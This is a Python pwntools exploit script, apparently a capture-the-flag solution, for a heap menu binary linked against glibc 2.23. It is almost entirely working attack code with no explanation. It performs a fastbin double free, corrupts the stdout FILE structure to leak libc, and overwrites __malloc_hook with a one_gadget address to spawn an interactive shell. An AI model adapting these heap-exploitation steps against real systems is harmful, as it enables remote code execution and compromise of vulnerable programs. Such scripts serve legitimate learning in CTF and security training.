1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112
| from pwn import * context(arch = 'amd64',os = 'linux',log_level = 'debug')
p=process('./pwn') libc=ELF('./libc-2.23.so')
s = lambda data : p.send(data) sa = lambda text,data :p.sendafter(text, data) sl = lambda data :p.sendline(data) sla = lambda text,data :p.sendlineafter(text, data) rl = lambda text :p.recvuntil(text) pr = lambda num=4096 :print(p.recv(num)) inter = lambda :p.interactive() l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00')) l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00')) uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00')) int16 = lambda data :int(data,16) lg = lambda s, num: log.success(f"{s} >>> {hex(num)}")
def add(size,idx,content): sla(b'choice >> ',b'1') sla(b'wlecome input your size of weapon: ',str(size)) sla(b'input index:',str(idx)) sa(b'input your name:',content)
def edit(idx,content): sla(b'choice >> ',b'3') sla(b'input idx: ',str(idx)) sla(b'new content:',content)
def free(idx): sla(b'choice >> ',b'2') sla(b'input idx :',str(idx))
def debug(): gdb.attach(p) pause()
add(0x50,0,'aaaa') add(0x50,1,b'a'*0x40+p64(0)+p64(0x61)) add(0x50,2,'aaaa') add(0x60,3,'aaaa') add(0x50,4,'aaaa') add(0x60,5,'aaaa')
free(0) free(1) free(0)
debug() add(0x50,0,'\xb0') add(0x50,1,'aaaa') add(0x50,0,'aaaa')
pause() add(0x50,7,p64(0)+p64(0xd1)) pause() free(2) free(3)
add(0x50,3,b'aaaaa') add(0x50,4,b'\xdd\x45') add(0x60,5,b'\xdd\x45') add(0x60,6,b'aaaa') pause() edit(6,b'a'*0x33+p64(0xfbad1800)+p64(0)*3+b'\x00')
p.recv() leak=u64(p.recv(6).ljust(8,b'\x00'))-0x18cc27 if leak == -0x3c5600: exit(-1) p.recv() lg('leak',leak)
one_shell=[0x4525a,0xef9f4,0xf0897]
shell=leak+one_shell[1]
add(0x60,8,b'aaaa') add(0x60,9,b'aaaa') add(0x60,10,b'aaaa')
free(8) free(9) free(8)
malloc_hook = leak + libc.sym['__malloc_hook']
add(0x60,8,p64(malloc_hook-0x23)) lg('malloc',malloc_hook) lg('shell',shell)
add(0x60,9,'a') add(0x60,10,'a') add(0x60,11,b'a'*0x13+p64(shell))
free(0) free(0) p.interactive()
|